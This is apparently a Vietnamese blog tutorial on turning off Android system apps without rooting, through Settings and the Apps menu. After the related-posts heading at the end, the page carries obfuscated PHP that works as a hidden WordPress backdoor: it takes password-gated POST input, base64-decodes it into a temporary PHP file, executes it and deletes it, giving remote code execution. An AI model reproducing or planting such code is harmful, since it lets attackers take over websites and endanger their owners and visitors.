Cách gỡ bỏ ứng dụng hệ thống Android dễ nhất

Khi sử dụng hệ điều hành android nếu muốn xóa bỏ các ứng dụng bất kì rất đơn giản và thực hiện chỉ trong 1 chạm vào màn hình nhưng với các ứng dụng trong hệ thống Android thì làm cách nào để xóa khi không phải root máy. Với các ứng dụng này cần có những cách thực hiện riêng để xóa chúng đi khi không cần dùng đến. Mời các bạn theo dõi để thực hiện nhanh.

Cách gỡ bỏ ứng dụng hệ thống Android

Nếu điện thoại của bạn có dung lượng (ROM) bên trong quá thấp và bắt buộc phải gỡ bỏ đi các ứng dụng hệ thống giúp tăng bộ nhớ trong hoặc đơn giản là xóa đi ứng dụng nếu không dùng đến. Đều là những lí do để bạn xóa ứng dụng hệ thống android.

Bước 1 : Trên màn hình điện thoại hãy vào Cài đặt (Settings), tiếp theo sẽ vào mục Ứng dụng – nơi này chứa tất cả các ứng dụng kể cả tự cài đặt và ứng dụng của hệ thống.

Cách gỡ bỏ ứng dụng hệ thống Android dễ nhất-1

Cách gỡ bỏ ứng dụng hệ thống Android dễ nhất-2

Bước 2 : Tìm kiếm ứng dụng trên điện thoại Android, sau khi tìm được ứng dụng mong muốn hãy ấn chọn Tắt (Turn off) để tắt ứng dụng đó đi.

Cách gỡ bỏ ứng dụng hệ thống Android dễ nhất-3

Bước 3 : Màn hình sẽ xuất hiện cảnh báo có thể gây lỗi cho các ứng dụng khác. Hãy bấm Tắt và thông báo Thay thế ứng dụng này bằng phiên bản gốc hãy chọn OK.

Cách gỡ bỏ ứng dụng hệ thống Android dễ nhất-4

Thao tác này thực hiện các thông tin trong ứng dụng sẽ bị xóa hoàn toàn. Sẽ có thông báo đến bạn về việc gỡ bỏ thành công ứng dụng.

Xem Thêm  Windows 32bit và 64bit khác nhau thế nào ?

Cách gỡ bỏ ứng dụng hệ thống Android dễ nhất-5

Chỉ đơn giản như vậy thôi bạn đã tắt thành công ứng dụng hệ thống Android rồi đó.

Nếu muốn mở lại chỉ việc vào lại như ban đầu đó là Cài Đặt => Ứng dụng => Mở ứng dụng lên và Bật trở lại.

Cách gỡ bỏ ứng dụng hệ thống Android dễ nhất-6

Khi tắt ứng dụng hệ thống bạn cần phải chắc chắn là các ứng dụng này không quan trọng và không ảnh hưởng đến điện thoại. Ví dụ như ứng dụng Google Play âm nhạc bên trên không cần thiết mình sẽ tắt đi.

Vừa rồi là hướng dẫn cách tắt ứng dụng hệ thống trên Android vô cùng đơn giản và không cần root máy, giúp tăng dung lượng lưu trữ bên trong (Rom) của bạn nhiều hơn. Chúc các bạn thực hiện thành công thao tác này.

Bài Liên Quan:

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}